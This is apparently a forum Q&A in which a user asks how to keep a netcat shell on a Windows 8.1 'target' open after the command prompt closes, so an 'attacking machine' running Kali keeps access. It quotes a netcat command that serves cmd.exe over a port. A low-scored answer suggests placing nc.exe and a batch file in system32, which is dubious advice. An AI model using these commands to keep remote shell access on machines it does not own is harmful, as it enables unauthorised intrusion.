# How to keep the reverse shell open in Netcat?

Tags: linux, netcat

As soon as the command prompt is closed on the target machine the reverse shell is closed on the client machine. Is there any way to keep the port open and Netcat working after the target machine closes the command prompt with Netcat, so that I can keep using the reverse shell on the attacking machine?
On target machine: Windows 8.1.

```
nc -Lp 123 -vv -e cmd.exe
```

On the client side(Kali Linux).

```
nc <ip> 123
```

Comment: yes , in windows command prompt , the target machine is windows 8.1 - point is to have the port open persistently so that i can access reverse shell on the linux machine after the command prompt on the windows machine is closed

Answer (score -1):

The solution is to put `nc.exe` in `system32`, and to create a batch file with the `nc` command you want to run and place in in `system32` as well.